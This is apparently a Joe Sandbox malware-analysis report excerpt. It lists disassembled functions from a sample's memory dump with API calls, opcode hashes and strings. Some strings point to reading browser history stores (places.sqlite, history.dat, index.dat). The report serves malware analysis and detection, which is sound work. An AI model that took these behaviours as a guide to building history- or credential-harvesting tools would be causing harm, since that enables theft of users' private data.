                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset
                                                                                                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                              • API String ID: 2221118986-1725073988
                                                                                                                                                              • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                              • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                              APIs
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??3@DeleteObject
                                                                                                                                                              • String ID: r!A
                                                                                                                                                              • API String ID: 1103273653-628097481
                                                                                                                                                              • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                              • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                              APIs
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                              • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$memcmp
                                                                                                                                                              • String ID: $$8
                                                                                                                                                              • API String ID: 2808797137-435121686
                                                                                                                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1979745280-0
                                                                                                                                                              • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                              • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                              • free.MSVCRT ref: 00418803
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1355100292-0
                                                                                                                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                              • memset.MSVCRT ref: 00403A55
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                              • String ID: history.dat$places.sqlite
                                                                                                                                                              • API String ID: 2641622041-467022611
                                                                                                                                                              • Opcode ID: 5bee45cdb6d082daa32fce0b5ea4b1357e7f956e37a37acc92fd9a7c9172319e
                                                                                                                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                              • Opcode Fuzzy Hash: 5bee45cdb6d082daa32fce0b5ea4b1357e7f956e37a37acc92fd9a7c9172319e
                                                                                                                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$File$PointerRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 839530781-0
                                                                                                                                                              • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                              • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                              • String ID: *.*$index.dat
                                                                                                                                                              • API String ID: 1974802433-2863569691
                                                                                                                                                              • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                              • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$FilePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1156039329-0
                                                                                                                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3397143404-0
                                                                                                                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1125800050-0
                                                                                                                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                              • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandleSleep
                                                                                                                                                              • String ID: }A
                                                                                                                                                              • API String ID: 252777609-2138825249
                                                                                                                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                              APIs
                                                                                                                                                              • malloc.MSVCRT ref: 00409A10
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                              • free.MSVCRT ref: 00409A31
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: freemallocmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3056473165-0
                                                                                                                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: d
                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
